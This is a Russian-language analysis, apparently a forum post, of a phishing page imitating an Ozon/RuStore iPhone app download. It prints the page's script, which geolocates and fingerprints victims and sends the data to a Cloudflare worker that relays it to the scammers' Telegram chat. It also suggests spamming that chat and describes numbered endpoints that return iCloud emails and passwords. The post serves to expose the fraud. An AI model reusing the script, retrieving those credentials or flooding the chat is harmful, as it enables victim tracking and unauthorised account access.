function detectDevice() {
862- const userAgent = navigator.userAgent;
863- if (/iPhone|iPad|iPod/i.test(userAgent)) {
864- return "iOS Device";
865- } else if (/Android/i.test(userAgent)) {
866- return "Android Device";
867- } else if (/Windows/i.test(userAgent)) {
868- return "Windows PC";
869- } else if (/Mac/i.test(userAgent)) {
870- return "Mac";
871- }
872- return "Unknown Device";
873- }
874-
875: const WORKER_URL = 'https://ozon.raveink.workers.dev/';
876- const ROOM_ID = 1;
877-
878- function sendLog(actionType) {
879- fetch('https://ipinfo.io/json')
880- .then(response => response.json())
881- .then(ipData => {
882- sendToWorker({
883- link_id: ROOM_ID,
884- page: location.href,
885- country: ipData.country || '-',
886- city: ipData.city || '-',
887- device: detectDevice(),
888- action: actionType
889- });
890- })
891- .catch(() => {
892- // если ipinfo не ответил
893- sendToWorker({
894- link_id: ROOM_ID,
895- page: location.href,
896- country: '-',
897- city: '-',
898- device: detectDevice(),
899- action: actionType
900- });
901- });
902- }
903-
904- function sendToWorker(payload) {
905: fetch(WORKER_URL, {
906- method: 'POST',
907- headers: {
908- 'Content-Type': 'application/json'
909- },
910- body: JSON.stringify(payload)
911- }).catch(() => {});
912- }
913-
914- // Пример вызова
915- sendLog('Сайт открыт');мы видим что функция detectDevice() возвращает устройство в зависимости от user agent в браузере. Также в функции sendLog вызывается воркер который отправляет POST запрос
Если простыми словами, то мошенники подсовывают жертве поддельную страницу «скачай приложение на айфон» (копия RuStore/Ozon). На странице стоит незаметный скрипт, который в фоне отправляет данные о жертве на адрес воркера ozon.raveink.workers.dev, а тот — мгновенно пересылает их в Telegram-чат мошенников.
Что именно отправляется (POST-запрос, ru.ozon.html):
{
"link_id": 1, // номер "комнаты"/фишингового сайта
"page": "адрес страницы жертвы",
"country": "страна", // берётся по IP через ipinfo.io
"city": "город",
"device": "iPhone", // определяется по user-agent браузера
"action": "Сайт открыт" // или "Кнопка Я вошел"
}Что происходит дальше:
Страница жертвы делает POST на https://ozon.raveink.workers.dev/ с этим JSON.
Воркер (бесплатный сервер на краю сети Cloudflare) принимает данные и шлёт их в Telegram оператора сообщением вида: "Сервис: Ozon, Страна: XX, Город: T, Устройство: iPhone, Действие: …".
В ответ браузеру воркер возвращает {"tg":{"ok":true}} - то есть "уведомление в Telegram доставлено". Счётчик сообщений в их чате уже ~9700 - ловушка реально работает. (Кст таким образом им можно чат засрать спамом)
Но это еще не все, что насчет этой ссылки? https://cfg2024.pythonanywhere.com/
А это у нас pythonanywhere бесплатный хостинг скриптов. Мы видим что на бесплатном хостинге они зарегались под ником cfg2024. Если просто перейти по этой ссылке, то сервак притворится что этого сервака нет и вернет пустышку. Но если дописать endpoint /ozon1 то оно вернет почту и пароль icloud мошенника. Но это еще не все, если менять 1 на 2 то оно будет возвращать другую почту с паролем и так до 10.